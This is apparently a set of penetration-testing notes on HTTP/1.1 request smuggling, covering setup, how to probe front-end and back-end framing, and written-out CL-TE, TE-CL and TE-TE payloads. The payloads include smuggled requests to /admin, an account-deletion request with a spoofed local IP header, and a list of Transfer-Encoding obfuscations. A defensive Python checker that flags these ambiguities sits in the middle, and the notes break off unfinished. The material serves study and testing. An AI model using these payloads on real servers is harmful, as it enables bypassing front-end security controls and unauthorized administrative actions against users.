What is HTTP/1.1 Request Smuggling

A vulnerability where attackers exploit discrepancies in how HTTP/1.1 requests are parsed by different servers (e.g., a proxy and a backend). By manipulating headers like Transfer-Encoding and Content-Length, an attacker can craft requests that are interpreted differently by each server, potentially bypassing security filters, causing unauthorized access, or smuggling malicious requests to be processed by the backend.


Methodology

# IMPORTANT SETTINGS
- Turn off the automatic "Update Content-Length" option
- Set the request to HTTP/1.1 (both in the settings and in the request itself)
- Enable visualisation of the \r \n characters

Remember that \r and \n count as characters when the Content-Length is computed.
---------------------------------------------------------------------------------

# Identify the Front-End Server header

Content-Length (CL) or Transfer-Encoding (TE)

Send an invalid request (see the "Frontend" test cases below) and observe which header the front-end honours.

----------------------------------------------------------------------------------
# Identify the Back-End Server header

Content-Length (CL) or Transfer-Encoding (TE)
- Try different payload variants to see whether the back-end's behaviour changes (e.g. whitespace, double TE headers, multi-line header, null bytes, ...)

Payloads

# CL-TE

GOAL: the front-end frames the request with Content-Length, the back-end with Transfer-Encoding (chunked), so a second request placed after the "0" chunk is read by the back-end.

## Frontend
POST / HTTP/1.1
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked

3
abc
x            ---> Front-end uses the first 6 characters (3\r\nabc) and x is dropped; the back-end errors because there is no terminating 0 chunk

=~=~=~=~=~=~=~=~=~=~=~=~

## Payload 1
POST / HTTP/1.1
Host: example.com
Content-Length: 116
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

x=           ---> The next request on the connection is appended to this dummy parameter

=~=~=~=~=~=~=~=~=~=~=~=~

## Payload 2
POST / HTTP/1.1
Host: example.com
Content-Length: 40
Transfer-Encoding: chunked

0

GET /hijuhgtf HTTP/1.1
x-Ignore: x           ---> The next request on the connection is appended to this dummy header

=~=~=~=~=~=~=~=~=~=~=~=~

## Payload 3 (if the smuggled request targets a reflected search parameter, the front-end's rewritten headers may be revealed)
Content-Length: 178
Transfer-Encoding: chunked

0

POST /admin/delete?username=carlos HTTP/1.1
X-VqDWQP-Ip: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 200

search=sdfcds          ---> The headers of the next request land here

- A Content-Length of 6 covers the 0 and the "G", so the front-end forwards both to the back-end (the back-end will not consume "G" since the chunk size is 0)

----------------------------------------------------------------------------------
# TE-CL (chunk sizes are HEX values, not decimal lengths)

GOAL: the front-end frames the request with Transfer-Encoding (chunked), the back-end with Content-Length, which cuts the request into two requests.

## Frontend
POST / HTTP/1.1 
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked

3
abc
x               ---> x is an invalid chunk size (request error when parsed with TE)


## Backend
POST / HTTP/1.1 
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked

0

x               ---> x will be dropped; an error means the back-end uses CL, a normal response means TE

=~=~=~=~=~=~=~=~=~=~=~=~

## Payload 1
POST / HTTP/1.1 
Host: example.com
Content-Length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

x=1
0
   ---> followed by another CRLF

- The 0 chunk sits directly after the body (no blank line in between)
- A Content-Length of 4 covers "5c" plus its \r\n
- 5c (hex, 92 bytes) is the length of "GPOST ... x=1", up to but not including the final CRLF

----------------------------------------------------------------------------------
# TE-TE (obfuscating the TE header)

Transfer-encoding: abc
Transfer-Encoding: abc
Transfer-Encoding: xchunked 
Transfer-Encoding : chunked 
Transfer-Encoding: chunked 
Transfer-Encoding: x Transfer-Encoding:[tab]chunked 
[space]Transfer-Encoding: chunked 
X: X[\n]Transfer-Encoding: chunked 
Transfer-Encoding : chunked
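The same ambiguities a front-end (or a log-review script) should reject, as an added Python example that is not part of these notes: it parses the request head and flags the CL/TE combinations and the TE obfuscations listed above. The function and finding names are my own.

```python
import re

# RFC 9110 token characters: a legal header field name contains nothing else.
_TOKEN = re.compile(rb"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")

def split_head(raw: bytes):
    """Return (request_line, [(name, value), ...]) for the head of a raw request.
    Lines are split on CRLF only, so a bare LF stays inside a field for inspection."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        if line[:1] in (b" ", b"\t"):            # obsolete line folding (obs-fold)
            headers.append((b"<obs-fold>", line.strip()))
            continue
        name, _, value = line.partition(b":")
        headers.append((name, value))
    return lines[0], headers

def framing_findings(raw: bytes) -> list[str]:
    """List reasons a front-end and a back-end may frame this request differently.
    An empty list means the framing is unambiguous under a strict parser."""
    _, headers = split_head(raw)
    findings = []
    cl = [v.strip() for n, v in headers if n.lower() == b"content-length"]
    te = [(n, v) for n, v in headers if n.strip().lower() == b"transfer-encoding"]
    if cl and te:
        findings.append("both-cl-and-te")        # CL-TE / TE-CL precondition
    if len(set(cl)) > 1:
        findings.append("conflicting-content-length")
    if len(te) > 1:
        findings.append("duplicate-te")          # double TE headers
    for name, value in te:
        if not _TOKEN.match(name):
            findings.append("malformed-te-name") # e.g. "Transfer-Encoding : chunked"
        elif value.strip().lower() != b"chunked":
            findings.append("non-chunked-te")    # e.g. xchunked, abc, "x"
    if any(n == b"<obs-fold>" for n, _ in headers):
        findings.append("obs-fold")              # multi-line / leading-space header
    if any(b"\n" in n or b"\n" in v for n, v in headers):
        findings.append("bare-lf")               # X: X[\n]Transfer-Encoding: chunked
    return findings

if __name__ == "__main__":
    probe = (b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 6\r\n"
             b"Transfer-Encoding : chunked\r\n\r\n0\r\n\r\nx")   # constructed sample
    print(framing_findings(probe))  # ['both-cl-and-te', 'malformed-te-name']
```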


## Frontend
POST / HTTP/1.1 
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked

3
abc
x               ---> x is an invalid chunk size (request error when parsed with TE)


## Backend
POST / HTTP/1.1 
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked

0

x               ---> x will be dropped; an error means the back-end uses CL, a normal response means TE

=~=~=~=~=~=~=~=~=~=~=~=~

## Payload (Using Obfuscation)

Tool